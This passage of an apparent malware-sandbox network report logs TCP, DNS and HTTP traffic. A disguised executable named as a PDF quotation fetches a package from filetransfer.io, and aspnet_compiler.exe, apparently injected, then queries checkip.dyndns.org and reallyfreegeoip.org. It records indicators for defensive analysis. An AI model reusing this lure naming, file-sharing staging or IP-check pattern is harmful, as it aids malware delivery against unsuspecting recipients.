Oct 4, 2024 11:23:30.981919050 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.981935978 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.981980085 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.983443022 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.983458042 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.983515024 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.983522892 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.983561993 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.985289097 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.985302925 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.985353947 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.985361099 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.985399961 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.986740112 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.986756086 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.986807108 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.986814976 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.986851931 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.990488052 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.990503073 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.990560055 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.990566969 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.990627050 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.991209030 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.991228104 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.991311073 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.991318941 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.991365910 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.064948082 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.064968109 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.065097094 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.065119982 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.065344095 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.067780018 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.067795992 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.067867994 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.067876101 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.067898035 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.067922115 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.068825006 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.068840981 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.068898916 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.068906069 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.068948030 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.070734024 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.070750952 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.070808887 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.070816994 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.070866108 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072135925 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072151899 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072211027 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072218895 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072259903 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072446108 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072510958 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072515965 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072530985 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:31.072562933 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072592020 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:31.072973013 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:18.522423029 CEST	49707	80	192.168.2.9	188.114.97.3
Oct 4, 2024 11:24:20.538614035 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:20.544012070 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:20.544117928 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:20.544424057 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:20.550277948 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:21.116134882 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:21.162388086 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:21.175291061 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:21.180196047 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:21.336754084 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:21.370940924 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.371089935 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:21.371186018 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.376113892 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.376166105 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:21.381170034 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:21.843076944 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:21.843161106 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.847281933 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.847290039 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:21.847565889 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:21.896775961 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.922918081 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:21.963392973 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.029687881 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.029768944 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.029824972 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.041879892 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.046673059 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.051723957 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:22.200370073 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:22.203432083 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.203485966 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.203551054 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.203974009 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.203988075 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.240555048 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.673319101 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.676112890 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.676141024 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.825501919 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.825715065 CEST	443	49715	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:22.825828075 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.826572895 CEST	49715	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:22.830430984 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.831779957 CEST	49716	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.835685968 CEST	80	49713	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:22.835896015 CEST	49713	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.836661100 CEST	80	49716	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:22.836765051 CEST	49716	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.836973906 CEST	49716	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:22.841764927 CEST	80	49716	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:23.416774988 CEST	80	49716	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:23.417093992 CEST	49716	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:23.418396950 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:23.418427944 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:23.418529034 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:23.418855906 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:23.418884993 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:23.422543049 CEST	80	49716	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:23.422616005 CEST	49716	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:23.881633997 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:23.883375883 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:23.883399963 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:24.009861946 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:24.009948969 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:24.010036945 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:24.010776997 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:24.016746998 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:24.021668911 CEST	80	49718	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:24.021832943 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:24.022149086 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:24.027173042 CEST	80	49718	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:24.586107969 CEST	80	49718	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:24.587809086 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:24.587842941 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:24.587928057 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:24.588304043 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:24.588315964 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:24.631098032 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.047781944 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:25.049472094 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:25.049504042 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:25.190493107 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:25.190723896 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:25.190817118 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:25.191549063 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:25.198206902 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.199275017 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.204504967 CEST	80	49718	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:25.204591036 CEST	49718	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.205323935 CEST	80	49720	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:25.205401897 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.205605984 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:25.211688042 CEST	80	49720	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:26.013389111 CEST	80	49720	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:26.015089035 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.015125036 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.015209913 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.015507936 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.015517950 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.068690062 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.488543034 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.490340948 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.490356922 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.636557102 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.636766911 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:26.636867046 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.637564898 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:26.641278982 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.642477036 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.646791935 CEST	80	49720	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:26.646869898 CEST	49720	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.647737980 CEST	80	49722	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:26.647814035 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.647919893 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:26.654769897 CEST	80	49722	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:27.210319996 CEST	80	49722	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:27.212255001 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.212282896 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.212383986 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.212973118 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.212990046 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.256139040 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.682136059 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.684257984 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.684278011 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.810936928 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.811209917 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:27.811283112 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.811899900 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:27.815792084 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.817092896 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.821002960 CEST	80	49722	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:27.821094036 CEST	49722	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.821939945 CEST	80	49724	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:27.822015047 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.822127104 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:27.826909065 CEST	80	49724	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:28.410779953 CEST	80	49724	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:28.412604094 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.412631035 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.412727118 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.413007021 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.413017988 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.459172964 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:28.868509054 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.870570898 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.870585918 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.995074034 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.995307922 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:28.995492935 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.996042967 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:28.999825954 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:29.000989914 CEST	49726	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:29.005420923 CEST	80	49724	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:29.005518913 CEST	49724	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:29.005789995 CEST	80	49726	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:29.005861044 CEST	49726	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:29.006099939 CEST	49726	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:29.011054993 CEST	80	49726	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:29.577189922 CEST	80	49726	158.101.44.242	192.168.2.9
Oct 4, 2024 11:24:29.578844070 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:29.578885078 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:29.578949928 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:29.579263926 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:29.579277992 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:29.631021023 CEST	49726	80	192.168.2.9	158.101.44.242
Oct 4, 2024 11:24:30.068490028 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:30.070122957 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:30.070147991 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:30.203012943 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:30.203085899 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 4, 2024 11:24:30.203135014 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:24:30.203879118 CEST	49727	443	192.168.2.9	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 11:23:26.333619118 CEST	49924	53	192.168.2.9	1.1.1.1
Oct 4, 2024 11:23:26.340992928 CEST	53	49924	1.1.1.1	192.168.2.9
Oct 4, 2024 11:23:28.839581013 CEST	56644	53	192.168.2.9	1.1.1.1
Oct 4, 2024 11:23:28.868607044 CEST	53	56644	1.1.1.1	192.168.2.9
Oct 4, 2024 11:24:20.525860071 CEST	64298	53	192.168.2.9	1.1.1.1
Oct 4, 2024 11:24:20.533245087 CEST	53	64298	1.1.1.1	192.168.2.9
Oct 4, 2024 11:24:21.362602949 CEST	53639	53	192.168.2.9	1.1.1.1
Oct 4, 2024 11:24:21.369827032 CEST	53	53639	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 11:23:26.333619118 CEST	192.168.2.9	1.1.1.1	0xcec4	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:23:28.839581013 CEST	192.168.2.9	1.1.1.1	0xeeb1	Standard query (0)	s20.filetransfer.io	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.525860071 CEST	192.168.2.9	1.1.1.1	0xe288	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:21.362602949 CEST	192.168.2.9	1.1.1.1	0x91b9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 11:23:26.340992928 CEST	1.1.1.1	192.168.2.9	0xcec4	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:23:26.340992928 CEST	1.1.1.1	192.168.2.9	0xcec4	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:23:28.868607044 CEST	1.1.1.1	192.168.2.9	0xeeb1	No error (0)	s20.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:23:28.868607044 CEST	1.1.1.1	192.168.2.9	0xeeb1	No error (0)	s20.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:20.533245087 CEST	1.1.1.1	192.168.2.9	0xe288	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:21.369827032 CEST	1.1.1.1	192.168.2.9	0x91b9	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 4, 2024 11:24:21.369827032 CEST	1.1.1.1	192.168.2.9	0x91b9	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s20.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	188.114.97.3	80	7264	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:23:26.353785038 CEST	95	OUT	GET /data-package/MlZtCPkK/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Oct 4, 2024 11:23:27.005758047 CEST	833	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 04 Oct 2024 09:23:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/MlZtCPkK/download CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPFvKGZl%2BjgB1kwnzkEcK%2FbjwMvKjSA86dycrpLZ%2FQNynwhqwXlxGLJdCDkYSd%2FPru6w6u1tZySkjqNgovhTTtsqFiPPMmiNZRfCwy1PuJ3DMIYSvHpzsieQWj2jRp4MXa0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cd41cfc3c9842b1-EWR Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49713	158.101.44.242	80	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 11:24:20.544424057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 4, 2024 11:24:21.116134882 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f5767c9fa7a4b0ae429344d4aa828c80 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 4, 2024 11:24:21.175291061 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
